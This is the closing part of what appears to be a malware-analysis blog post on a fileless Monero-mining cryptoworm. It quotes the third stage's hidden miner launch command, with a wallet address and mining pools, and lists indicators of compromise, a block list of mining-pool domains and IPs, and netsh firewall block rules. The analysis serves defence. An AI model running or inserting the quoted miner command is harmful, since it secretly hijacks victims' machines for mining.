|
Introducing the Third Stage
|
Third Stage Execution of Monero Miner
The clear text Monero address is visible on the code.
Unfortunately the Monero address is not trackable so far.
Monero address: 46CJt5F7qiJiNhAFnSPN1G7BMTftxtpikUjt8QXRFwFH2c3e1h6QdJA5dFYpTXK27dEL9RN3H2vLc6eG2wGahxpBK5zmCuE
and the used server is: stratum+tcp://pool.supportxmr.com:80
w.run "%temp%\taskservice.exe -B
-o stratum+tcp://pool.supportxmr.com:80 -u
46CJt5F7qiJiNhAFnSPN1G7BMTftxtpikUjt8QXRFwFH2c3e1h6QdJA5dFYpTXK27dEL9RN3H2vLc6eG2wGahxpBK5zmCuE
-o stratum+tcp://mine.xmrpool.net:80 -u
46CJt5F7qiJiNhAFnSPN1G7BMTftxtpikUjt8QXRFwFH2c3e1h6QdJA5dFYpTXK27dEL9RN3H2vLc6eG2wGahxpBK5zmCuE
-o stratum+tcp://pool.minemonero.pro:80 -u
46CJt5F7qiJiNhAFnSPN1G7BMTftxtpikUjt8QXRFwFH2c3e1h6QdJA5dFYpTXK27dEL9RN3H2vLc6eG2wGahxpBK5zmCuE
-p x" ,0
Many interesting other sections should be analyzed
but for now lets stop here.
IOC.
Please find some of the most interesting IoC for you
convenience.
- URL: http://118.184.48.95:8000/
- Monero Address: 46CJt5F7qiJiNhAFnSPN1G7BMTftxtpikUjt8QXRFwFH2c3e1h6QdJA5dFYpTXK27dEL9RN3H2vLc6eG2wGahxpBK5zmCuE
- Sha256: 19e15a4288e109405f0181d921d3645e4622c87c4050004357355b7a9bf862cc
- Sha256: 038d4ef30a0bfebe3bfd48a5b6fed1b47d1e9b2ed737e8ca0447d6b1848ce309
- URL: http://118.184.48.95:8000/
- Monero Address: 46CJt5F7qiJiNhAFnSPN1G7BMTftxtpikUjt8QXRFwFH2c3e1h6QdJA5dFYpTXK27dEL9RN3H2vLc6eG2wGahxpBK5zmCuE
- Sha256: 19e15a4288e109405f0181d921d3645e4622c87c4050004357355b7a9bf862cc
- Sha256: 038d4ef30a0bfebe3bfd48a5b6fed1b47d1e9b2ed737e8ca0447d6b1848ce309
Conclusion.
We are facing one of the first complex delivery of
cryptocoin mining Malware. Everybody knows about CryptoMine, BitCoinMiner and
Adylkuzz Malware which basically dropped on the target machine a BitCoin Miner,
so if you are wondering: Why Marco do you write: "one of the first
Malware" ? Well actually I wrote one of the "first complex"
delivery. Usual coins Malware are delivered with no propagation modules, with
no exploiting module and with not file-less techniques. In fact, the way this
Monero CPU Miner has been delivered, includes advanced methodologies of memory
inflation, where the unpacked Malware is not saved on Hard Drive (a technique
to bypass some Anti Virus) but it is inflated directly on memory and called
directly from memory itself.
We can consider this Malware as a last generation of -all
in memory- CryptoWorm.
Another interesting observation, at least on my personal
point of view, comes from the first stage. Why the attacker included this
useless stage ? It appears to be not useful at all, it's a mere dropper wth no
controls nor evasions. The attacker could have delivered just the second stage
within the first stage in it, assuring a more stealth network fingerprint. So
why the attacker decided to deliver the CryptoWorm through the first stage ?
Maybe the first stage is part of a bigger framework ? Are we facing a new
generation of Malware Generator Kits ?
List of Ip/domain to be blocked
|
Pool name
|
Ip Block List
|
|
bohemianpool.com
|
80.188.53.27
|
|
dwarfpool.com
|
104.25.51.105
|
|
fasthash.net
|
198.255.38.242
|
|
iwanttoearn.money
|
212.175.35.221
|
|
minemonero.gq
|
163.172.174.140
|
|
minercircle.com
|
163.172.80.114
|
|
minexmr.com
|
104.25.209.15
|
|
minexmr.org
|
52.8.187.102
|
|
mixpools.org
|
149.202.175.112
|
|
monero.crypto-pool.fr
|
212.83.158.14
|
|
monero.hashvault.pro
|
107.191.46.207
|
|
monero.lindon-pool.win
|
151.80.41.29
|
|
monero.miners.pro
|
194.247.13.160
|
|
monero.riefly.id
|
103.10.61.52
|
|
monero.us.to
|
174.138.53.64
|
|
monerohash.com
|
198.251.81.82
|
|
monerominer.life
|
138.197.199.239
|
|
moneroocean.stream
|
104.24.121.33
|
|
moneropool.com
|
104.27.159.16
|
|
moneropool.nl
|
139.162.158.112
|
|
moriaxmr.com
|
178.254.29.69
|
|
nanopool.org
|
104.27.111.34
|
|
pool.xmr.pt
|
94.46.164.183
|
|
pooldd.com
|
104.27.150.118
|
|
poolto.be
|
130.240.22.202
|
|
ratchetmining.com
|
136.144.137.125
|
|
supportxmr.com
|
88.99.138.74
|
|
teracycle.net
|
163.172.174.140
|
|
usxmrpool.com
|
167.88.115.253
|
|
viaxmr.com
|
104.24.106.79
|
|
xmr.alimabi.cn
|
61.160.224.169
|
|
xmr.mypool.online
|
78.47.63.190
|
|
xmr.prohash.net
|
138.201.206.47
|
|
xmr.suprnova.cc
|
145.239.65.23
|
|
xmrpool.eu
|
176.31.105.53
|
|
xmrpool.net
|
107.167.87.242
|
|
xmrpool.xyz
|
165.227.65.65
|
Run these commands and block the connections from
firewall
netsh advfirewall firewall add rule name="IP
Block" dir=in interface=any action=block remoteip=94.23.41.130/32
netsh advfirewall firewall add rule name="IP
Block" dir=in interface=any action=block remoteip=37.59.43.131/32
netsh advfirewall firewall add rule name="IP
Block" dir=in interface=any action=block remoteip=37.59.44.193/32
netsh advfirewall firewall add rule name="IP
Block" dir=in interface=any action=block remoteip=37.59.45.174/32
netsh advfirewall firewall add rule name="IP
Block" dir=in interface=any action=block remoteip=37.59.54.205/32
netsh advfirewall firewall add rule name="IP
Block" dir=in interface=any action=block remoteip=37.59.55.60/32
netsh advfirewall firewall add rule name="IP
Block" dir=in interface=any action=block remoteip=37.187.154.79/32
netsh advfirewall firewall add rule name="IP
Block" dir=in interface=any action=block remoteip=46.105.103.169/32
netsh advfirewall firewall add rule name="IP
Block" dir=in interface=any action=block remoteip=78.46.89.102/32
netsh advfirewall firewall add rule name="IP
Block" dir=in interface=any action=block remoteip=78.46.91.134/32
netsh advfirewall firewall add rule name="IP
Block" dir=in interface=any action=block remoteip=78.46.91.171/32
netsh advfirewall firewall add rule name="IP
Block" dir=in interface=any action=block remoteip=91.121.87.10/32
netsh advfirewall firewall add rule name="IP
Block" dir=in interface=any action=block remoteip=94.23.41.130/32
netsh advfirewall firewall add rule name="IP
Block" dir=in interface=any action=block remoteip=94.23.206.130/32
netsh advfirewall firewall add rule name="IP
Block" dir=in interface=any action=block remoteip=94.23.212.204/32
netsh advfirewall firewall add rule name="IP
Block" dir=in interface=any action=block remoteip=94.130.164.60/32
netsh advfirewall firewall add rule name="IP
Block" dir=in interface=any action=block remoteip=176.31.117.82/32
netsh advfirewall firewall add rule name="IP
Block" dir=in interface=any action=block remoteip=178.63.48.196/32
netsh advfirewall firewall add rule name="IP
Block" dir=in interface=any action=block remoteip=188.165.199.78/32
netsh advfirewall firewall add rule name="IP
Block" dir=in interface=any action=block remoteip=188.165.214.76/32
netsh advfirewall firewall add rule name="IP
Block" dir=in interface=any action=block remoteip=188.165.254.85/32
netsh advfirewall firewall add rule name="IP
Block" dir=in interface=any action=block remoteip=80.188.53.27/32
netsh advfirewall firewall add rule name="IP
Block" dir=in interface=any action=block remoteip=104.25.51.105/32
netsh advfirewall firewall add rule name="IP
Block" dir=in interface=any action=block remoteip=198.255.38.242/32
netsh advfirewall firewall add rule name="IP
Block" dir=in interface=any action=block remoteip=212.175.35.221/32
netsh advfirewall firewall add rule name="IP
Block" dir=in interface=any action=block remoteip=163.172.174.140/32
netsh advfirewall firewall add rule name="IP
Block" dir=in interface=any action=block remoteip=163.172.80.114/32
netsh advfirewall firewall add rule name="IP
Block" dir=in interface=any action=block remoteip=104.25.209.15/32
netsh advfirewall firewall add rule name="IP
Block" dir=in interface=any action=block remoteip=52.8.187.102/32
netsh advfirewall firewall add rule name="IP
Block" dir=in interface=any action=block remoteip=149.202.175.112/32
netsh advfirewall firewall add rule name="IP
Block" dir=in interface=any action=block remoteip=212.83.158.14/32
netsh advfirewall firewall add rule name="IP
Block" dir=in interface=any action=block remoteip=107.191.46.207/32
netsh advfirewall firewall add rule name="IP
Block" dir=in interface=any action=block remoteip=151.80.41.29/32
netsh advfirewall firewall add rule name="IP
Block" dir=in interface=any action=block remoteip=194.247.13.160/32
netsh advfirewall firewall add rule name="IP
Block" dir=in interface=any action=block remoteip=103.10.61.52/32
netsh advfirewall firewall add rule name="IP
Block" dir=in interface=any action=block remoteip=174.138.53.64/32
netsh advfirewall firewall add rule name="IP
Block" dir=in interface=any action=block remoteip=198.251.81.82/32
netsh advfirewall firewall add rule name="IP
Block" dir=in interface=any action=block remoteip=138.197.199.239/32
netsh advfirewall firewall add rule name="IP
Block" dir=in interface=any action=block remoteip=104.24.121.33/32
netsh advfirewall firewall add rule name="IP
Block" dir=in interface=any action=block remoteip=104.27.159.16/32
netsh advfirewall firewall add rule name="IP
Block" dir=in interface=any action=block remoteip=139.162.158.112/32
netsh advfirewall firewall add rule name="IP
Block" dir=in interface=any action=block remoteip=178.254.29.69/32
netsh advfirewall firewall add rule name="IP
Block" dir=in interface=any action=block remoteip=104.27.111.34/32
netsh advfirewall firewall add rule name="IP
Block" dir=in interface=any action=block remoteip=94.46.164.183/32
netsh advfirewall firewall add rule name="IP
Block" dir=in interface=any action=block remoteip=104.27.150.118/32
netsh advfirewall firewall add rule name="IP
Block" dir=in interface=any action=block remoteip=130.240.22.202/32
netsh advfirewall firewall add rule name="IP
Block" dir=in interface=any action=block remoteip=136.144.137.125/32
netsh advfirewall firewall add rule name="IP
Block" dir=in interface=any action=block remoteip=88.99.138.74/32
netsh advfirewall firewall add rule name="IP
Block" dir=in interface=any action=block remoteip=163.172.174.140/32
netsh advfirewall firewall add rule name="IP
Block" dir=in interface=any action=block remoteip=167.88.115.253/32
netsh advfirewall firewall add rule name="IP
Block" dir=in interface=any action=block remoteip=104.24.106.79/32
netsh advfirewall firewall add rule name="IP
Block" dir=in interface=any action=block remoteip=61.160.224.169/32
netsh advfirewall firewall add rule name="IP
Block" dir=in interface=any action=block remoteip=78.47.63.190/32
netsh advfirewall firewall add rule name="IP
Block" dir=in interface=any action=block remoteip=138.201.206.47/32
netsh advfirewall firewall add rule name="IP
Block" dir=in interface=any action=block remoteip=145.239.65.23/32
netsh advfirewall firewall add rule name="IP
Block" dir=in interface=any action=block remoteip=176.31.105.53/32
netsh advfirewall firewall add rule name="IP
Block" dir=in interface=any action=block remoteip=107.167.87.242/32
netsh advfirewall firewall add rule name="IP
Block" dir=in interface=any action=block remoteip=165.227.65.65/32
No comments:
Post a Comment
Note: Only a member of this blog may post a comment.